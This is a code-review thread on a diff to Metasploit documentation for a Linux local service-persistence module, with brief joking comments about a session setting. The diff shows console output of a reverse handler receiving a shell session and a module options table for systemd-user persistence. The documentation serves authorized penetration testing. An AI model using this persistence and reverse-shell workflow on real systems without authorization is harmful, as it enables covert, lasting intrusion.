documentation/modules/exploit/linux/local/service_persistence.md

```diff
@@ -252,3 +253,53 @@ Now with a multi handler, we can catch systemd restarting the process every 10se
     [*] Started reverse handler on 192.168.199.128:4444 
     [*] Starting the payload handler...
     [*] Command shell session 8 opened (192.168.199.128:4444 -> 192.168.199.130:47056) at 2016-06-22 10:37:30 -0400
+
+### systemd user (Ubuntu 16.04 Server - vagrant)
+
+    msf5 exploit(linux/local/service_persistence) > options
+
+    Module options (exploit/linux/local/service_persistence):
+
+       Name        Current Setting  Required  Description
+       ----        ---------------  --------  -----------
+       SERVICE                      no        Name of service to create
+       SESSION     -1               yes       The session to run this module on.
```

Comment:
`-1` ?

Reply:
I'm lazy and have terrible short-term memory.

#2952

Reply:
I also would have accepted "it's magic"

Reply:
With our level of documentation, it might as well be.